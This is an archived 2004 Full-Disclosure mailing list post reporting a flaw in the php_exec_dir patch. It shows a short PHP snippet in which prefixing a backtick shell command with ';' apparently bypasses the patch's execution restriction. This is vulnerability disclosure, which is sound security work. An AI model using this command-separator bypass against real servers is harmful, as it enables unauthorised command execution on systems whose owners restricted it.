[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] flaw in php_exec_dir patch

To: <full-disclosure@xxxxxxxxxxxxxxxx>
Subject: [Full-Disclosure] flaw in php_exec_dir patch
From: "VeNoMouS" <venom@xxxxxxxxxxx>
Date: Wed, 23 Jun 2004 13:20:18 +1200

Found a issue last night while testing php_exec_dir patch

if you do the following

$blah=`ps aux`;
echo nl2br($blah);

php_exec_dir will block the call if you have set the exec_dir parm in php or 
apache

anyway.... if you do this

$blah=`;ps aux`;
echo nl2br($blah);

it bypasses the exec block and excutes the ps due to the ';', as bash 
interrupts ';' as a new cmd, ive emailed the author but no response.

Follow-Ups:
- Re: [Full-Disclosure] flaw in php_exec_dir patch
  - From: npguy

Prev by Date: RE: [Full-Disclosure] RE: M$ - so what should they do?
Next by Date: [Full-Disclosure] [waraxe-2004-SA#033 - Multiple security holes in PhpNuke - part 1]
Previous by thread: [Full-Disclosure] MDKSA-2004:061 - Updated dhcp packages fix buffer overflow vulnerabilities
Next by thread: Re: [Full-Disclosure] flaw in php_exec_dir patch
Index(es):
- Date
- Thread